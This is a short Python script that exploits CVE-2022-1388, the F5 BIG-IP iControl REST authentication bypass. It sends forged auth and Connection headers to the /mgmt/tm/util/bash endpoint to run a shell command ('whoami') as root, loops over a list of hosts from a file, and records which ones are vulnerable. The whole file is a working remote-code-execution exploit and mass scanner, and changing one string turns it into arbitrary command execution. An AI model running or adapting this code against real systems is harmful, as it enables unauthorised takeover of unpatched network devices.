CVE-2022-1388.py

import requests
import json

proxies = {
    'http': 'http://127.0.0.1:6152',
    'https': 'https://127.0.0.1:6152',
}


def check(host):
    headers = {
        "X-F5-Auth-Token": "a",
        "Authorization": "Basic YWRtaW46",
        "Cache-Control": "max-age=0",
        "Connection": "Keep-Alive, X-F5-Auth-Token"
    }
    url = "https://{}/mgmt/tm/util/bash".format(host)

    data = {
        "command": "run",
        "utilCmdArgs": "-c whoami"
    }
    try:
        response = requests.post(url, proxies=proxies,
                                 verify=False, headers=headers, data=json.dumps(data))
        content = response.content
        print(content)
        return(content)
    except requests.exceptions.ConnectionError as e:
        print("Error", e.args)
        return None


def single_scan(host):
    result = check(host)
    if(b'tm:util:bash:runstate' in result):
        print("{} is vulnerable to CVE-2022-1388".format(host))
        with open('CVE-2022-1388.txt', 'a') as file:
            file.write(host)
        file.close()


def file_scan(host_file):
    for line in open(host_file):
        host = line.strip()
        single_scan(host)


if __name__ == "__main__":
    file_scan("host.txt")